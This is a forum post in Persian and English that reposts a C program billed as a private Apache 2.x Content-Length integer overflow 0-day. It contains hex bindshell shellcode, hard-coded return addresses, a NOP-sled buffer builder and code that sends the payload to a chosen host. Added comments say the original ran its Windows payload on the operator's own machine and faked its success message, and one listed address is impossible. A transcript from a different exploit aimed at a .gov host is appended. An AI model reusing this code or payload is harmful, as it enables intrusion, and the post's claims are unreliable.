Apache 2.x Overflow Exploit

    به زبان c هست :

    Reviewer note, before you build this: ConstructBuffer() ends by casting scode2 to a function pointer and starting it with CreateThread(), so the embedded Windows payload runs on the machine executing this program, whatever <Details> target was chosen — that is the listing's real effect. main() then prints "Exploit successfull, shellcode executed" for any non-zero send() result, which includes SOCKET_ERROR (-1), so its output says nothing about the target. Nothing in the code substantiates the claimed Apache Content-Length overflow; it only sends a POST with a Content-Length header of 2147483647.

    کد:
    /*
    [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!]
     
                           [!Division by Infinity!]
                                  presents
     
     
                  ,    ,      /\   /\              /(   )\
                /( /\ )\  _\ \_/ /_            \ \_/ /   , /\ ,
               |\_||_/| < \_   _/ >          /_   _\  /| || |\
               \______/  \|0   0|/          | \> </ | |\_||_/|
                  _\/_   _(_  ^  _)_         (_  ^  _)  \____/
                  ( () ) /`\|V"""V|/`\      /`\|IIIII|/`\ _\/_
                    {}   \  \_____/  /      \  \_____/  /  ()
                    ()   /\   )=(   /\      /\   )=(   /\  ()
                   {}  /  \_/\=/\_/  \    /  `-.\=/.-'  \ ()
     
                   Apache <= 2.x POST Content-Length integer overflow
                                     !0DAY!
     
                                 by Mindphuck/[!DBI!]
     
     
                   This is fsck1n pr1v8, r3l34z3 d1z t0 th3 wh1th8 c0mmUn1ty 4nd
                   w3 w1ll t34r y0ur fuqin h34d 0v!1!
     
    [!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!][!DBI!][!PRIV8!][!0DAY!]
    */
     
    // Fixed compile bugs for GCC compiler, untested... KOrUPt.
    // Windows-only: windows.h supplies the WinSock 1.1 API used below, so link
    // against it (MinGW: -lws2_32 or -lwsock32). Review before building: the
    // CreateThread() call at the end of ConstructBuffer() executes scode2, the
    // embedded Windows payload, inside this process on the local machine.
     
    #include <windows.h>
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
     
    // Payload the author labels "linux bindshell on port 4444". It is an opaque
    // blob whose first bytes look like a self-decoding XOR stub (the
    // \x81\x73\x13 pattern near the start); nothing in this listing verifies
    // what it actually does, so treat the label as a claim, not a fact.
    // SetHellcode() copies it into `hellcode` for target indices 6 and 7.
    const char* scode1 =
    "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x30"
    "\x2c\xd6\x7f\x83\xeb\xfc\xe2\xf4\x01\xf7\x85\x3c\x63\x46\xd4\x15"
    "\x56\x74\x4f\xf6\xd1\xe1\x56\xe9\x73\x7e\xb0\x17\x21\x70\xb0\x2c"
    "\xb9\xcd\xbc\x19\x68\x7c\x87\x29\xb9\xcd\x1b\xff\x80\x4a\x07\x9c"
    "\xfd\xac\x84\x2d\x66\x6f\x5f\x9e\x80\x4a\x1b\xff\xa3\x46\xd4\x26"
    "\x80\x13\x1b\xff\x79\x55\x2f\xcf\x3b\x7e\xbe\x50\x1f\x5f\xbe\x17"
    "\x1f\x4e\xbf\x11\xb9\xcf\x84\x2c\xb9\xcd\x1b\xff";
     
    // Payload the author labels "win32 bindshell on port 4444"; the same kind of
    // opaque, apparently self-decoding blob as scode1, and likewise unverified
    // here. It has two uses in this file: SetHellcode() copies it into
    // `hellcode` for the Windows targets (indices 0-5), and ConstructBuffer()
    // casts it to a function pointer and runs it on THIS machine via
    // CreateThread(), regardless of the target chosen. If the label is accurate,
    // that opens an unauthenticated shell listener on the operator's own host.
    const char* scode2 =
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa0"
    "\xa7\x83\x65\x83\xeb\xfc\xe2\xf4\x5c\xcd\x68\x28\x48\x5e\x7c\x9a"
    "\x5f\xc7\x08\x09\x84\x83\x08\x20\x9c\x2c\xff\x60\xd8\xa6\x6c\xee"
    "\xef\xbf\x08\x3a\x80\xa6\x68\x2c\x2b\x93\x08\x64\x4e\x96\x43\xfc"
    "\x0c\x23\x43\x11\xa7\x66\x49\x68\xa1\x65\x68\x91\x9b\xf3\xa7\x4d"
    "\xd5\x42\x08\x3a\x84\xa6\x68\x03\x2b\xab\xc8\xee\xff\xbb\x82\x8e"
    "\xa3\x8b\x08\xec\xcc\x83\x9f\x04\x63\x96\x58\x01\x2b\xe4\xb3\xee"
    "\xe0\xab\x08\x15\xbc\x0a\x08\x25\xa8\xf9\xeb\xeb\xee\xa9\x6f\x35"
    "\x5f\x71\xe5\x36\xc6\xcf\xb0\x57\xc8\xd0\xf0\x57\xff\xf3\x7c\xb5"
    "\xc8\x6c\x6e\x99\x9b\xf7\x7c\xb3\xff\x2e\x66\x03\x21\x4a\x8b\x67"
    "\xf5\xcd\x81\x9a\x70\xcf\x5a\x6c\x55\x0a\xd4\x9a\x76\xf4\xd0\x36"
    "\xf3\xf4\xc0\x36\xe3\xf4\x7c\xb5\xc6\xcf\x92\x39\xc6\xf4\x0a\x84"
    "\x35\xcf\x27\x7f\xd0\x60\xd4\x9a\x76\xcd\x93\x34\xf5\x58\x53\x0d"
    "\x04\x0a\xad\x8c\xf7\x58\x55\x36\xf5\x58\x53\x0d\x45\xee\x05\x2c"
    "\xf7\x58\x55\x35\xf4\xf3\xd6\x9a\x70\x34\xeb\x82\xd9\x61\xfa\x32"
    "\x5f\x71\xd6\x9a\x70\xc1\xe9\x01\xc6\xcf\xe0\x08\x29\x42\xe9\x35"
    "\xf9\x8e\x4f\xec\x47\xcd\xc7\xec\x42\x96\x43\x96\x0a\x59\xc1\x48"
    "\x5e\xe5\xaf\xf6\x2d\xdd\xbb\xce\x0b\x0c\xeb\x17\x5e\x14\x95\x9a"
    "\xd5\xe3\x7c\xb3\xfb\xf0\xd1\x34\xf1\xf6\xe9\x64\xf1\xf6\xd6\x34"
    "\x5f\x77\xeb\xc8\x79\xa2\x4d\x36\x5f\x71\xe9\x9a\x5f\x90\x7c\xb5"
    "\x2b\xf0\x7f\xe6\x64\xc3\x7c\xb3\xf2\x58\x53\x0d\x50\x2d\x87\x3a"
    "\xf3\x58\x55\x9a\x70\xa7\x83\x65";
     
    /* Working buffers owned by this file: `hellcode` receives a copy of the
     * selected payload in SetHellcode(), `sc` the assembled request body in
     * ConstructBuffer(); main() frees both before it exits. Both start unset. */
    char *hellcode = NULL;
    char *sc = NULL;
     
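    /* One target as this tool understands it. */
    struct Target
    {
       char* Ident;   /* human-readable name, printed by Usage() and main() */
       char* RetAddr; /* 4 raw little-endian bytes; ConstructBuffer() copies
                         RetAddr[0..3] and never treats it as a C string */
    };

    /* Target table, indexed by the <Details> argument (0-7). Indices 0-5 are
     * paired with the Windows payload and 6-7 with the Linux one in
     * SetHellcode(). Every address below is a hard-coded value with nothing in
     * this listing to back it; at least the Windows 2000 entry (0xFFF967AB) is
     * above the 32-bit user-mode range, so it cannot be a jmp *%esp inside
     * ntdll.dll as its comment says. Inner braces added: the original relied on
     * brace elision, which compiles but hides the pairing and draws
     * -Wmissing-braces. */
    struct Target TR[8] = {
      { "Windows XP 5.1.0.0 SP0 (IA32)",
        "\x1c\x80\xf5\x77" },   // jmp *%esp @ ntdll.dll (unverified)
      { "Windows NT 4.0.6.0 SP6 (IA32)",
        "\x63\xD4\xF9\x77" },   // jmp *%esp @ ntdll.dll (unverified)
      { "Windows 2000 5.0.1.0 SP1 (IA32)",
        "\xAB\x67\xF9\xFF" },   // claimed jmp *%esp @ ntdll.dll; 0xFFF967AB is not a user-mode address
      { "Windows 2003 Server 5.2.0.0 SP0 (IA32)",
        "\xAB\x8B\xFB\x77" },   // jmp *%esp @ ntdll.dll (unverified)
      { "Windows 2003 Server 5.2.1.0 SP1 (IA32)",
        "\xD3\xFE\x86\x7C" },   // jmp *%esp @ ntdll.dll (unverified)
      { "Windows XP 5.1.2.0 SP2 (IA32)",
        "\xED\x1E\x94\x7C" },   // jmp *%esp @ ntdll.dll (unverified)
      { "Linux 2.4.x Kernel",
        "\x25\xE7\xFF\xFF" },   // jmp *%esp @ linux-gate.so.1 (unverified)
      { "Linux 2.6.x Kernel",
        "\x77\xE7\xFF\xFF" },   // jmp *%esp @ linux-gate.so.1 (unverified)
    };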
     
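    /* Copy the payload for target index TG into the global `hellcode`.
     * TG > 5 selects scode1 (the Linux blob), anything else scode2 (Windows);
     * the caller is expected to have range-checked TG (main() allows 0-7).
     * Fixes vs. the original: the buffer is strlen()+1 bytes so the terminator
     * fits (the original malloc'ed strlen() bytes and then strcpy'ed into
     * them, a one-byte heap overflow), the allocation is checked, and a
     * previous copy is released instead of leaked. Exits on allocation
     * failure. */
    void SetHellcode(int TG)
    {
      const char *src = (TG > 5) ? scode1 : scode2;
      size_t len = strlen(src);

      free(hellcode); /* free(NULL) is a no-op */
      hellcode = malloc(len + 1);
      if (hellcode == NULL) {
        perror("[-]malloc");
        exit(1);
      }
      memcpy(hellcode, src, len + 1); /* includes the terminating NUL */
    }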
     
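    /* Assemble the request body for target TG into the global `sc`:
     *   [0, 1024)     NOP sled (0x90)
     *   [1024, 1028)  TR[TG].RetAddr, 4 raw bytes
     *   [1028, ...)   the payload copied by SetHellcode()
     * followed by a terminating NUL so main() can format it with "%s".
     * TG must already be range-checked (0-7).
     *
     * What changed, and why:
     *  - The original allocated only strlen(hellcode) bytes for `sc` and then
     *    wrote 1028 + strlen(hellcode) of them: a heap overflow on every run.
     *  - The original started the sled at index 4 and left sc[0..3] zero, so
     *    the later "%s" saw an empty string and the request body was empty.
     *  - The original ended by casting scode2 to a function pointer, starting
     *    it with CreateThread() and waiting on it with INFINITE. That executes
     *    the embedded Windows payload in the operator's own process whatever
     *    target was selected — the real effect of this program — and it has
     *    been removed; nothing else in this file needs it.
     * Exits on allocation failure. */
    void ConstructBuffer(int TG)
    {
      enum { SLED_LEN = 1024, RET_LEN = 4, PAYLOAD_OFF = SLED_LEN + RET_LEN };
      size_t payload_len;

      SetHellcode(TG);
      payload_len = strlen(hellcode);

      free(sc); /* drop any previous buffer instead of leaking it */
      sc = malloc(PAYLOAD_OFF + payload_len + 1);
      if (sc == NULL) {
        perror("[-]malloc");
        exit(1);
      }
      memset(sc, 0x90, SLED_LEN);                        /* NOP sled */
      memcpy(sc + SLED_LEN, TR[TG].RetAddr, RET_LEN);    /* return address */
      memcpy(sc + PAYLOAD_OFF, hellcode, payload_len + 1); /* payload + NUL */
    }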
     
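    /* Print the command line and the numbered target list, then exit(1).
     * Never returns. The target count is taken from TR itself rather than
     * repeating the literal 8, so the help stays in step with the table. */
    void Usage(void)
    {
      int n = (int)(sizeof TR / sizeof TR[0]);
      int i;

      printf("Usage: lulz.exe <Target> <Port> <Details>\n");
      printf("[*]Detail list: \n");
      for (i = 0; i < n; i++)
        printf("[%d]%s\n", i, TR[i].Ident);
      printf("\nExample: lulz.exe localhost 80 1\n");
      exit(1);
    }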
     
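    /* Entry point: lulz.exe <Target> <Port> <Details>.
     * Builds the buffer for target index <Details>, connects to <Target>:<Port>
     * over TCP and sends one POST whose Content-Length header is 0x7FFFFFFF
     * (2147483647) and whose body is the buffer from ConstructBuffer(). That is
     * the whole "exploit": nothing in this file demonstrates an Apache defect,
     * and the original printed "shellcode executed" whenever send() returned
     * non-zero — which includes SOCKET_ERROR (-1) — so it reported success
     * unconditionally.
     *
     * Fixes vs. the original: arguments are parsed with strtol and range
     * checked instead of atoi; sockaddr_in is zeroed before use; the resolved
     * address is copied with memcpy after checking its family and length
     * rather than through an unsigned long* cast; socket() is compared with
     * INVALID_SOCKET (SOCKET is unsigned on Windows, so `s < 0` was never
     * true); the request is built with snprintf and its request line now ends
     * in CRLF like the other header lines; exactly the formatted length is sent
     * instead of the whole 2048-byte array with its trailing zeros; send()'s
     * result is compared with SOCKET_ERROR; WinSock failures are reported via
     * WSAGetLastError() (perror() reads errno, which WinSock does not set); and
     * every exit path releases the socket, WinSock and both heap buffers.
     * Returns 0 when the request was sent, 1 on any error. */
    int main(int argc, char *argv[])
    {
      SOCKET s = INVALID_SOCKET;
      struct sockaddr_in sin;
      struct hostent *he;
      char buffer[2048];
      char *end;
      long v;
      int target;
      unsigned short iPort;
      int len, sent;
      int wsa_started = 0;
      int rc = 1;
      WSADATA wsa_prov;

      printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
      printf("[!Priv8 Apache <= 2.x Exploit!]\r\n");
      printf("[!       by Mindphuck/[!DBI!]   !]\r\n");
      printf("[! Apache <= 2.x POST Content-Length integer overflow!]\r\n");
      printf("[! Leads to remote code execution    !]\r\n");
      printf("[!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!DBI!]\r\n");
      if (argc < 4)
        Usage();

      /* Port: a whole decimal number in 1..65535. */
      errno = 0;
      v = strtol(argv[2], &end, 10);
      if (end == argv[2] || *end != '\0' || errno == ERANGE || v < 1 || v > 65535) {
        printf("[-]Invalid Port ...\n");
        return 1;
      }
      iPort = (unsigned short)v;

      /* Target index: must name an entry of TR. */
      errno = 0;
      v = strtol(argv[3], &end, 10);
      if (end == argv[3] || *end != '\0' || errno == ERANGE
          || v < 0 || v >= (long)(sizeof TR / sizeof TR[0])) {
        printf("[-]Invalid Details ...\n");
        return 1;
      }
      target = (int)v;

      printf("[*]Attacking %s:%d running %s...\n", argv[1], iPort, TR[target].Ident);
      ConstructBuffer(target);

      if (WSAStartup(0x0101, &wsa_prov) != 0) {
        fprintf(stderr, "[-]WSAStartup error: %d\n", WSAGetLastError());
        goto cleanup;
      }
      wsa_started = 1;

      he = gethostbyname(argv[1]);
      if (he == NULL || he->h_addrtype != AF_INET
          || he->h_length != (int)sizeof sin.sin_addr) {
        fprintf(stderr, "[-]gethostbyname error: %d\n", WSAGetLastError());
        goto cleanup;
      }
      memset(&sin, 0, sizeof sin);
      sin.sin_family = AF_INET;
      sin.sin_port = htons(iPort);
      memcpy(&sin.sin_addr, he->h_addr, sizeof sin.sin_addr);

      /* Content-Length is a fixed 0x7FFFFFFF; the body is whatever
       * ConstructBuffer() produced (it is NUL-terminated). */
      len = snprintf(buffer, sizeof buffer,
                     "POST /index.php HTTP/1.0\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n%s\r\n",
                     0x7FFFFFFF, sc);
      if (len < 0 || (size_t)len >= sizeof buffer) {
        fprintf(stderr, "[-]Request does not fit in %u bytes\n", (unsigned)sizeof buffer);
        goto cleanup;
      }

      s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      if (s == INVALID_SOCKET) {
        fprintf(stderr, "[-]Socket error: %d\n", WSAGetLastError());
        goto cleanup;
      }

      if (connect(s, (const struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        fprintf(stderr, "[-]Connection error: %d\n", WSAGetLastError());
        goto cleanup;
      }

      sent = send(s, buffer, len, 0);
      if (sent == SOCKET_ERROR) {
        fprintf(stderr, "[-]Send error: %d\n", WSAGetLastError());
        goto cleanup;
      }
      /* A completed send() proves only that bytes left this host; nothing
       * here can observe what, if anything, the target did with them. */
      printf("[+]Sent %d of %d bytes; no information about execution on the target is available.\n",
             sent, len);
      rc = 0;

    cleanup:
      if (s != INVALID_SOCKET)
        closesocket(s);
      if (wsa_started)
        WSACleanup();
      free(hellcode);
      hellcode = NULL;
      free(sc);
      sc = NULL;
      return rc;
    }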
    توضیحات :
    (Note: the transcript below comes from a different program — Adam 'pi3' Zabrocki's "Apache_0day", which takes -v/-p/-h options and is built with gcc on a Linux host. The listing above is Windows-only, is invoked as `lulz.exe <Target> <Port> <Details>`, and prints none of this output.)

    کد:
    pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day
    pi3-darkstar ~ # ./Apache_0day -h
    
        ...::: -=[ Apache 2.2.xx 0day exploit  (by Adam 'pi3' Zabrocki) ]=- :::...
    
        Usage: ./Apache_0day <options>
    
            Options:
                 -v <victim>
                 -p <port>
                 -h this help screen
    
     pi3-darkstar ~ # ./Apache_0day -v xxx.gov
    [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

    که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو
    [/align]